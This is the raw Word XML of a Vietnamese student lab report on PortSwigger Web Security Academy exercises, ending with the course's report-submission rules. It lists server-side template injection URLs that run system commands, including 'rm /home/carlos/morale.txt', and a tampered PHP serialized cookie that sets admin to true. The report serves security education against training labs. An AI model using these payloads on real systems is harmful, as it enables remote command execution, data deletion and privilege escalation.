      <w:r w:rsidRPr="00C20E5D">
        <w:t>https://0a8200a7038a7abc80c3eee000da002b.web-security-academy.net/?message=?message=&lt;%25%3d+7*7+%25&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7967548E" w14:textId="31EF6821" w:rsidR="00C20E5D" w:rsidRDefault="00C20E5D" w:rsidP="00DE285C"/>
    <w:p w14:paraId="487A9A45" w14:textId="55F43CE6" w:rsidR="00C20E5D" w:rsidRDefault="00C20E5D" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00C20E5D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE8E319" wp14:editId="34ACA328">
            <wp:extent cx="6115050" cy="1008380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="270184555" name="Picture 1" descr="A picture containing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84555" name="Picture 1" descr="A picture containing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1D52" w14:textId="6FEB714A" w:rsidR="00CF10AB" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00CF10AB">
        <w:t>https://0a8200a7038a7abc80c3eee000da002b.web-security-academy.net/?message=%=&lt;%= system("</w:t>
      </w:r>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF10AB">
        <w:t>") %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666140D" w14:textId="75C79A72" w:rsidR="00CF10AB" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00CF10AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057CFB7B" wp14:editId="4DBC1F31">
            <wp:extent cx="6115050" cy="1544955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="293229414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9414" name="Picture 1" descr="A picture containing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EAFF" w14:textId="2E864400" w:rsidR="00CF10AB" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00CF10AB">
        <w:t xml:space="preserve">https://0a8200a7038a7abc80c3eee000da002b.web-security-academy.net/?message=&lt;%= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF10AB">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF10AB">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>ls -a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF10AB">
        <w:t>") %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A4268" w14:textId="3AB2AF24" w:rsidR="00CF10AB" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00CF10AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F5DB5B" wp14:editId="31843D0C">
            <wp:extent cx="6115050" cy="1377315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19752229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293" name="Picture 1" descr="Text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7F0F" w14:textId="425846ED" w:rsidR="00C20E5D" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00CF10AB">
        <w:t xml:space="preserve">https://0a8200a7038a7abc80c3eee000da002b.web-security-academy.net/?message=&lt;%= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF10AB">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF10AB">
        <w:t>"rm /home/carlos/morale.txt") %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C619E" w14:textId="4FA5C38B" w:rsidR="00C20E5D" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00CF10AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B4A49A6" wp14:editId="44870CC8">
            <wp:extent cx="6115050" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="205402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2815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9659" w14:textId="5FD3888E" w:rsidR="00CF10AB" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C"/>
    <w:p w14:paraId="512AA094" w14:textId="466BA253" w:rsidR="00CF10AB" w:rsidRDefault="00CF10AB" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F9BA86" wp14:editId="62D6652C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1453595486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95486" name="Picture 1" descr="Graphical user interface, websit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3560" w14:textId="0D0A0E9B" w:rsidR="00F77178" w:rsidRDefault="00F77178" w:rsidP="00DE285C"/>
    <w:p w14:paraId="55DF10AC" w14:textId="79CD965E" w:rsidR="00F77178" w:rsidRDefault="00F77178" w:rsidP="00F77178">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C4BF0" w14:textId="708059D6" w:rsidR="00F77178" w:rsidRDefault="00F77178" w:rsidP="00DE285C"/>
    <w:p w14:paraId="07034A7A" w14:textId="50202292" w:rsidR="003F7842" w:rsidRDefault="00EE40A9" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B4A4AF" wp14:editId="0AFABC8D">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="74488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8711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2176" w14:textId="0245A855" w:rsidR="00EE40A9" w:rsidRDefault="00EE40A9" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4557829F" wp14:editId="5C6A6350">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="142479748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97483" name="Picture 1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BC4D" w14:textId="43848E5A" w:rsidR="003F7842" w:rsidRDefault="00EE40A9" w:rsidP="00DE285C">
      <w:r w:rsidRPr="00EE40A9">
        <w:t>O:4:"User":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE40A9">
        <w:t>2:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE40A9">
        <w:t>s:8:"username";s:6:"wiener";s:5:"admin";b:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43E4CD" w14:textId="4F55F766" w:rsidR="00EE40A9" w:rsidRDefault="00EE40A9" w:rsidP="00EE40A9">
      <w:r w:rsidRPr="00EE40A9">
        <w:t>O:4:"User":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE40A9">
        <w:t>2:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE40A9">
        <w:t>s:8:"username";s:6:"wiener";s:5:"admin";b:</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE40A9">
        <w:t>;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B6EB5D" w14:textId="1326A097" w:rsidR="00EE40A9" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BEB69EA" wp14:editId="6FC73B45">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="11782476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4768" name="Picture 1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1017" w14:textId="33F7F667" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r w:rsidRPr="005317F6">
        <w:t>Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB49A72" w14:textId="75B46E4E" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73CEAC53" wp14:editId="5D0DCE69">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="46745080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50805" name="Picture 1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737" w14:textId="6D3D5DAE" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r w:rsidRPr="005317F6">
        <w:t>Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30%3D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663FD4EB" w14:textId="77777777" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="504BA5A5" w14:textId="011E97E4" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="0DB5BD5A" w14:textId="102DF007" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="4D5E02B6" w14:textId="2A9AF139" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="1524E57C" w14:textId="77777777" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="6392E079" w14:textId="77777777" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="32605AC8" w14:textId="19BD3014" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF2AF9C" wp14:editId="7A057A21">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="151097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7878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3BEC" w14:textId="77777777" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C"/>
    <w:p w14:paraId="354A60E8" w14:textId="40DA0EAB" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r w:rsidRPr="005317F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DEA63C0" wp14:editId="4CC87269">
            <wp:extent cx="6115050" cy="2882900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209527787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77875" name="Picture 1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9EE0" w14:textId="5005FA5A" w:rsidR="005317F6" w:rsidRDefault="005317F6" w:rsidP="00DE285C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10621FFF" wp14:editId="35A0C848">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="116857626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76263" name="Picture 1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4B77" w14:textId="77777777" w:rsidR="00EE40A9" w:rsidRDefault="00EE40A9" w:rsidP="00DE285C"/>
    <w:p w14:paraId="6C535840" w14:textId="3E590B07" w:rsidR="003F7842" w:rsidRDefault="003F7842" w:rsidP="003F7842">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7908D066" w14:textId="622FD67C" w:rsidR="003F7842" w:rsidRDefault="003F7842" w:rsidP="003F7842"/>
    <w:p w14:paraId="60442F95" w14:textId="64E7DB45" w:rsidR="003F7842" w:rsidRDefault="00695D94" w:rsidP="003F7842">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776C403E" wp14:editId="695C831D">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="14013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61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3BA" w14:textId="0AE148DE" w:rsidR="00695D94" w:rsidRDefault="00695D94" w:rsidP="003F7842">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A0F44E" wp14:editId="7CFCD76C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="167428129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81298" name="Picture 1" descr="Graphical user interface, application, Word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3626" w14:textId="0912AD98" w:rsidR="00695D94" w:rsidRDefault="00695D94" w:rsidP="003F7842">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23640FC5" wp14:editId="211DA369">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1277372853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72853" name="Picture 1" descr="Graphical user interface, application, Word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4768" w14:textId="7E057D99" w:rsidR="00695D94" w:rsidRDefault="00695D94" w:rsidP="003F7842">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4092D2BE" wp14:editId="5C212140">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="96047379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3798" name="Picture 1" descr="Graphical user interface, application, Word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4DA5" w14:textId="3A72D794" w:rsidR="00695D94" w:rsidRDefault="00695D94" w:rsidP="003F7842">
      <w:r w:rsidRPr="00695D94">
        <w:t>facty32ln3a773ru5hn3h05mxsgroeao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC3462B" w14:textId="08E228B5" w:rsidR="003F7842" w:rsidRPr="003F7842" w:rsidRDefault="00695D94" w:rsidP="003F7842">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67405682" wp14:editId="24B8E9A3">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="16399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81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7B9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62B45982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3BDAC03F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520DF991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D2C10DB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1E8F91F4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04DF02CE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A7B3F0C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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EA1A0" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Sinh viên đọc kỹ yêu cầu trình bày bên dưới trang này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB511D" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63A524" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C34D97" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="450" w:hanging="450"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>YÊU CẦU CHUNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708468E7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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="bookmark=id.2et92p0"/>
      <w:bookmarkStart w:id="4" w:name="bookmark=id.3znysh7"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>Sinh viên tìm hiểu và thực hành theo hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B957F6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 w:cs="UTM Neo Sans Intel"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>Nộp báo cáo kết quả chi tiết những việc (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>) bạn đã thực hiện, quan sát thấy và kèm ảnh chụp màn hình kết quả (nếu có); giải thích cho quan sát (nếu có).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B703D87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Sinh viên báo cáo kết quả thực hiện và nộp bài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5309E" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both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Báo cáo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68570FA9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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>. Tập trung vào nội dung, không mô tả lý thuyết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00C6AB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ội dung trình bày bằng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Font chữ Times New Romans/ hoặc font chữ của mẫu báo cáo này (UTM Neo Sans Intel/UTM Viet Sach)– cỡ chữ 13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Canh đều (Justify) cho văn bản. Canh giữa (Center) cho ảnh chụp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD28D21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Đặt tên theo định dạng: [Mã lớp]-SessionX_GroupY. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> đó X là Thứ tự buổi Thực hành, Y là số thứ tự Nhóm Thực hành/Tên Cá nhân đã đăng ký với GV). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277CD9F8" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both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Ví dụ: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>NT101.K</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>11.ANTT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:i/>
        </w:rPr>
        <w:t>]-Session1_Group3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC2D4A9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ếu báo cáo có nhiều file, nén tất cả file vào file .ZIP với cùng tên file báo cáo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6541DD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eastAsia="UVN Viet Sach" w:hAnsi="UTM Viet Sach" w:cs="UVN Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Không đặt tên đúng định dạng – yêu cầu, sẽ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>KHÔNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> chấm điểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539CBFD5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ộp file báo cáo trên theo thời gian đã thống nhất tại courses.uit.edu.vn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7834A8" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
        </w:rPr>
        <w:t>Đánh giá</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>: Sinh viên hiểu và tự thực hiện. Khuyến khích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188E88D" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Chuẩn bị tốt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E22B0" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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 xml:space="preserve">Có nội dung mở rộng, ứng dụng trong kịch bản/câu hỏi phức tạp hơn, có đóng góp </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="bookmark=id.3dy6vkm"/>
      <w:bookmarkStart w:id="6" w:name="bookmark=id.tyjcwt"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve">xây dựng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95C65A" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bài sao chép, trễ, … sẽ được xử lý tùy mức độ vi phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E75F35" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3C5F66" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="center" w:pos="4815"/>
        </w:tabs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  <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>HẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8FBFE1" w14:textId="4354E2D4" w:rsidR="00884FA0" w:rsidRPr="006C5BFB" w:rsidRDefault="00884FA0" w:rsidP="006C5BFB"/>
    <w:sectPr w:rsidR="00884FA0" w:rsidRPr="006C5BFB" w:rsidSect="00696078">
      <w:headerReference w:type="default" r:id="rId86"/>
      <w:footerReference w:type="default" r:id="rId87"/>
      <w:headerReference w:type="first" r:id="rId88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CD36" w14:textId="77777777" w:rsidR="00AF6EEC" w:rsidRDefault="00AF6EEC" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="53F7F2F0" w14:textId="77777777" w:rsidR="00AF6EEC" w:rsidRDefault="00AF6EE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  <w:font w:name="UTM Viet Sach">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default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</w:t>
                          </w:r>
